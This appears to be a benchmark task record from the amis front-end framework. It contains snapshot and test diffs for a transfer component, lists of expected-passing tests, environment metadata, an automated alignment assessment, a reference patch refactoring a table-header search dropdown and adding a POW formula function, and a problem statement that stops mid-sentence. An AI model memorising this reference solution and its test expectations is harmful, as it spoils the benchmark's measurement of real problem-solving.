exports[`Renderer:transfer follow left mode 2`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -2865,7 +2916,10 @@ exports[`Renderer:transfer follow left mode 2`] = ` class="cxd-Tree-itemText" title="战士" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="战士" + > 战士 </span> </span> @@ -2901,7 +2955,10 @@ exports[`Renderer:transfer follow left mode 2`] = ` class="cxd-Tree-itemText" title="曹操" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="曹操" + > 曹操 </span> </span> @@ -3112,7 +3169,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-197 " > option-197 </span> @@ -3146,7 +3204,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-198 " > option-198 </span> @@ -3180,7 +3239,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-199 " > option-199 </span> @@ -3214,7 +3274,8 @@ exports[`Renderer:transfer group mode with virtual 1`] = ` class="cxd-GroupedSelection-itemLabel" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="option-200 " > option-200 </span> @@ -4943,7 +5004,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-1" + > label-1 </span> </label> @@ -4963,7 +5027,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-3" + > label-3 </span> </label> @@ -4983,7 +5050,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-5" + > label-5 </span> </label> @@ -5003,7 +5073,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-7" + > label-7 </span> </label> @@ -5023,7 +5096,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-9" + > label-9 </span> </label> @@ -5043,7 +5119,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-11" + > label-11 </span> </label> @@ -5063,7 +5142,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-13" + > label-13 </span> </label> @@ -5083,7 +5165,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-15" + > label-15 </span> </label> @@ -5103,7 +5188,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-17" + > label-17 </span> </label> @@ -5123,7 +5211,10 @@ exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-19" + > label-19 </span> </label> @@ -5575,7 +5666,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-1" + > label-1 </span> </label> @@ -5596,7 +5690,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-3" + > label-3 </span> </label> @@ -5617,7 +5714,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-5" + > label-5 </span> </label> @@ -5638,7 +5738,10 @@ exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` <label class="cxd-Selections-label" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="label-7" + > label-7 </span> </label> @@ -5898,7 +6001,8 @@ exports[`Renderer:transfer tree 1`] = ` title="法师" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="法师 " > 法师 </span> @@ -5938,7 +6042,8 @@ exports[`Renderer:transfer tree 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -5983,7 +6088,8 @@ exports[`Renderer:transfer tree 1`] = ` title="战士" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="战士 " > 战士 </span> @@ -6023,7 +6129,8 @@ exports[`Renderer:transfer tree 1`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -6063,7 +6170,8 @@ exports[`Renderer:transfer tree 1`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -6108,7 +6216,8 @@ exports[`Renderer:transfer tree 1`] = ` title="打野" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="打野 " > 打野 </span> @@ -6148,7 +6257,8 @@ exports[`Renderer:transfer tree 1`] = ` title="李白" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="李白 " > 李白 </span> @@ -6188,7 +6298,8 @@ exports[`Renderer:transfer tree 1`] = ` title="韩信" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="韩信 " > 韩信 </span> @@ -6228,7 +6339,8 @@ exports[`Renderer:transfer tree 1`] = ` title="云中君" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="云中君 " > 云中君 </span> @@ -6432,7 +6544,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="诸葛亮" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="诸葛亮 " > 诸葛亮 </span> @@ -6472,7 +6585,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="曹操" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="曹操 " > 曹操 </span> @@ -6512,7 +6626,8 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` title="钟无艳" > <span - class="" + class=" cxd-Selection-ellipsis-line" + title="钟无艳 " > 钟无艳 </span> @@ -6561,7 +6676,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="w" + > w </span> </label> @@ -6581,7 +6699,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="x" + > x </span> </label> @@ -6601,7 +6722,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="y" + > y </span> </label> @@ -6621,7 +6745,10 @@ exports[`Renderer:transfer with showInvalidMatch & unmatched do not add 1`] = ` <label class="cxd-Selections-label is-invalid" > - <span> + <span + class="cxd-Selection-ellipsis-line" + title="z" + > z </span> </label> diff --git a/packages/amis/__tests__/renderers/Form/transfer.test.tsx b/packages/amis/__tests__/renderers/Form/transfer.test.tsx index b27b046ae..ad9b6abfa 100644 --- a/packages/amis/__tests__/renderers/Form/transfer.test.tsx +++ b/packages/amis/__tests__/renderers/Form/transfer.test.tsx @@ -1227,7 +1227,7 @@ test('Renderer:transfer with searchApi', async () => { await wait(300); - const caocao = container.querySelector('span[title=曹操]'); + const caocao = container.querySelector('span[title=李白]'); expect(caocao).toBeNull(); });
[ "evalute:Math" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE" ]
No new interfaces are introduced.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 34, "num_modified_lines": 523, "pr_author": "lurunze1226", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B5", "code_quality": null, "confidence": 0.9, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": true, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1157-R1158", "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1190", "https://github.com/baidu/amis/pull/8354/files?diff=unified&w=0#diff-74ef3e735568303c05308159e59fd316cca5f1fba7b0b805b50c43be1ca55cf3R1251" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue requests adding a `clearPersistDataAfterSubmit` prop to the Form renderer to clear persisted data on navigation. The test patch does modify Form.tsx to call `store.clearLocalPersistData()`, but it also contains a large number of unrelated changes (snapshot updates, UI class tweaks, addition of a new POW function in the formula evaluator, etc.) that are not part of the requested fix. These extraneous modifications cause the test suite to diverge from the original intent, indicating the patch is primarily a collection of unrelated artifacts rather than a focused solution.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Snapshot files for many Select/Transfer components are altered without relation to the Form persist‑data fix", "New tests for a POW math function are added in the formula package", "Numerous UI component files (selection, tree, transfer, etc.) receive style and class name changes", "Various editor and core files are modified (e.g., drag‑and‑drop handling, store logic) that are unrelated to the Form issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
08412adcb500e92f7ebb55453cd26a028d0c1368
2023-10-12 01:53:11
baidu__amis-8360
diff --git a/examples/components/CRUD/List.jsx b/examples/components/CRUD/List.jsx index 15d65c389..18aef7409 100644 --- a/examples/components/CRUD/List.jsx +++ b/examples/components/CRUD/List.jsx @@ -3,32 +3,18 @@ export default { remark: 'bla bla bla', body: { type: 'crud', - api: '/api/sample', + name: 'thelist', + api: { + method: 'get', + url: '/api/sample', + sendOn: '${mode}' + }, mode: 'list', draggable: true, saveOrderApi: { url: '/api/sample/saveOrder' }, orderField: 'weight', - filter: { - title: '条件搜索', - submitText: '', - body: [ - { - type: 'input-text', - name: 'keywords', - placeholder: '通过关键字搜索', - addOn: { - label: '搜索', - type: 'submit' - } - }, - { - type: 'plain', - text: '这只是个示例, 目前搜索对查询结果无效.' - } - ] - }, affixHeader: true, bulkActions: [ { @@ -63,6 +49,44 @@ export default { ], quickSaveApi: '/api/sample/bulkUpdate', quickSaveItemApi: '/api/sample/$id', + headerToolbar: [ + { + type: 'form', + mode: 'inline', + wrapWithPanel: false, + submitOnChange: true, + submitOnInit: true, + target: 'thelist', + body: [ + { + type: 'select', + name: 'mode', + className: 'mb-0', + selectFirst: true, + options: [ + { + label: '模式 1', + value: 'mode1' + }, + { + label: '模式 2', + value: 'mode2' + } + ] + }, + { + type: 'input-text', + name: 'keywords', + placeholder: '通过关键字搜索', + className: 'mb-0', + addOn: { + label: '搜索', + type: 'submit' + } + } + ] + } + ], listItem: { actions: [ { diff --git a/packages/amis-core/src/WithStore.tsx b/packages/amis-core/src/WithStore.tsx index 6e1c37aee..6c9a0d4b9 100644 --- a/packages/amis-core/src/WithStore.tsx +++ b/packages/amis-core/src/WithStore.tsx @@ -252,7 +252,7 @@ export function HocStoreFactory(renderer: { props.store?.storeType === 'ComboStore' ? undefined : syncDataFromSuper( - store.data, + props.data, (props.data as any).__super, (prevProps.data as any).__super, store, diff --git a/packages/amis-core/src/store/crud.ts b/packages/amis-core/src/store/crud.ts index dc2df1cc6..d254a63f5 100644 --- a/packages/amis-core/src/store/crud.ts +++ b/packages/amis-core/src/store/crud.ts @@ -61,12 +61,11 @@ export const CRUDStore = ServiceStore.named('CRUDStore') // 因为会把数据呈现在地址栏上。 return createObject( createObject(self.data, { - ...self.query, items: self.items.concat(), selectedItems: self.selectedItems.concat(), unSelectedItems: self.unSelectedItems.concat() }), - {} + {...self.query} ); }, diff --git a/packages/amis-core/src/utils/helper.ts b/packages/amis-core/src/utils/helper.ts index 3d4fa48b4..ebbdfc9e8 100644 --- a/packages/amis-core/src/utils/helper.ts +++ b/packages/amis-core/src/utils/helper.ts @@ -1587,7 +1587,7 @@ export function mapObject( } if (Array.isArray(value)) { - return value.map(item => mapObject(item, fn)); + return value.map(item => mapObject(item, fn, skipFn)); } if (isObject(value)) { @@ -1595,7 +1595,8 @@ export function mapObject( Object.keys(tmpValue).forEach(key => { (tmpValue as PlainObject)[key] = mapObject( (tmpValue as PlainObject)[key], - fn + fn, + skipFn ); }); return tmpValue; diff --git a/packages/amis-editor-core/src/util.ts b/packages/amis-editor-core/src/util.ts index 65f87f69b..4529381b8 100644 --- a/packages/amis-editor-core/src/util.ts +++ b/packages/amis-editor-core/src/util.ts @@ -1063,14 +1063,12 @@ export function getI18nEnabled() { } /** schema 翻译方法 */ -export function translateSchema(schema: any, replaceData?: any) { +export function translateSchema(schema: any, replaceData?: any, skipFn?: any) { replaceData = replaceData || (window as any)?.editorStore?.appCorpusData; if (!isPlainObject(replaceData)) { return schema; } - return mapObject(schema, (item: any) => { - return replaceData[item] || item; - }); + return mapObject(schema, (item: any) => replaceData[item] || item, skipFn); } /** 应用级别的翻译方法 */ diff --git a/packages/amis-editor/src/renderer/FormulaControl.tsx b/packages/amis-editor/src/renderer/FormulaControl.tsx index f00316787..b6c03d110 100644 --- a/packages/amis-editor/src/renderer/FormulaControl.tsx +++ b/packages/amis-editor/src/renderer/FormulaControl.tsx @@ -515,16 +515,16 @@ export default class FormulaControl extends React.Component< } else { curRendererSchema.placeholder = '请输入静态值'; } - // 设置popOverContainer - curRendererSchema.popOverContainer = window.document.body; } + JSONPipeOut(curRendererSchema); + // 对 schema 进行国际化翻译 if (this.appLocale && this.appCorpusData) { return translateSchema(curRendererSchema, this.appCorpusData); } - return JSONPipeOut(curRendererSchema); + return curRendererSchema; } @autobind diff --git a/packages/amis-formula/src/doc.md b/packages/amis-formula/src/doc.md index f571ac097..37b95f335 100644 --- a/packages/amis-formula/src/doc.md +++ b/packages/amis-formula/src/doc.md @@ -268,6 +268,17 @@ 取数据最后一个。 +### POW + +用法:`POW(base, exponent)` + + * `base:number` 基数 + * `exponent:number` 指数 + +返回:`number` 基数的指数次幂 + +返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + ## 文本函数 ### LEFT diff --git a/packages/amis-formula/src/doc.ts b/packages/amis-formula/src/doc.ts index c3a72cf65..5291b3029 100644 --- a/packages/amis-formula/src/doc.ts +++ b/packages/amis-formula/src/doc.ts @@ -465,6 +465,29 @@ export const doc: { }, namespace: '数学函数' }, + { + name: 'POW', + description: + '返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。', + example: 'POW(base, exponent)', + params: [ + { + type: 'number', + name: 'base', + description: '基数' + }, + { + type: 'number', + name: 'exponent', + description: '指数' + } + ], + returns: { + type: 'number', + description: '基数的指数次幂' + }, + namespace: '数学函数' + }, { name: 'LEFT', description: '返回传入文本左侧的指定长度字符串。', diff --git a/packages/amis-formula/src/evalutor.ts b/packages/amis-formula/src/evalutor.ts index 7befa4b79..8e44dc051 100644 --- a/packages/amis-formula/src/evalutor.ts +++ b/packages/amis-formula/src/evalutor.ts @@ -13,6 +13,7 @@ import uniqBy from 'lodash/uniqBy'; import isEqual from 'lodash/isEqual'; import isPlainObject from 'lodash/isPlainObject'; import get from 'lodash/get'; +import isNumber from 'lodash/isNumber'; import {EvaluatorOptions, FilterContext, FilterMap, FunctionMap} from './types'; import {FormulaEvalError} from './error'; @@ -978,6 +979,24 @@ export class Evaluator { return arr.length ? arr[arr.length - 1] : null; } + /** + * 返回基数的指数次幂,参数base为基数,exponent为指数,如果参数值不合法则返回基数本身,计算结果不合法,则返回NaN。 + * + * @example POW(base, exponent) + * @param {number} base 基数 + * @param {number} exponent 指数 + * @namespace 数学函数 + * + * @returns {number} 基数的指数次幂 + */ + fnPOW(base: number, exponent: number) { + if (!isNumber(base) || !isNumber(exponent)) { + return base; + } + + return Math.pow(base, exponent); + } + // 文本函数 normalizeText(raw: any) { diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close = this.close.bind(this); - this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? () => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? () => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> );
chore: 调整列的快速搜索逻辑干掉之前没清理干净的排序相关逻辑 Close: #8342 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> Refactored and simplified a table header component that supports searching and filtering. Used React hooks and removed unused code. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> > _Sing, O Muse, of the skillful refactorer_ > _Who tamed the `HeadCellSearchDropDown` with hooks_ > _And cleansed the form schema and data of clutter_ > _And cast away the props and code of nooks_ ### Why Close: #8342 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at 1113e82</samp> * Refactor `HeadCellSearchDropDown` component from class to functional, using hooks and removing unused props and fields ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L6-R6), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L26-R48), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L62-R62), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L74-R71), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L86-R85), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207)) * Replace `controls` with `body` in `searchable` prop and change default type to `input-text` ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L62-R62), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L74-R71)) * Remove `orderBy` and `orderDir` fields from form schema and data, as they are no longer needed ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L86-R85), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118), [link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207)) * Use `dispatchEvent` prop to trigger `columnSearch` event before submitting form values ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L147-R118)) * Use `ref` to attach span element as container and target for `Overlay` component ([link](https://github.com/baidu/amis/pull/8360/files?diff=unified&w=0#diff-f7780da9091a356f2349f5d0b7e7c95fbc83b5ea89ebed9e46482c91572183a5L217-R207))
**Title** Remove residual sorting logic from column quick‑search and streamline related components **Problem** The quick‑search dropdown in table headers still injected hidden sorting fields (`orderBy`, `orderDir`) and relied on outdated class‑based implementation, causing confusing query parameters and unnecessary complexity. Similar leftover sorting handling existed in the CRUD store and example configuration. **Root Cause** Sorting‑related code was never fully removed after refactoring, and the component used an internal store copy instead of the incoming props for data synchronization. **Fix / Expected Behavior** - Eliminate hidden sorting fields from the quick‑search form schema and stop passing `orderBy`/`orderDir` to the dropdown. - Rewrite the dropdown as a functional component using hooks, with proper opening/closing logic and overlay container handling. - Ensure the dropdown only emits the `columnSearch` event with the actual search values. - Update the CRUD example to use a header toolbar form for mode selection and keyword search, removing the old `filter` block. - Adjust the store sync to use the component’s `data` prop, and simplify query handling in the CRUD store. - Extend the generic `mapObject` helper to accept an optional skip function and propagate it through recursive calls. - Update schema translation utilities to forward the 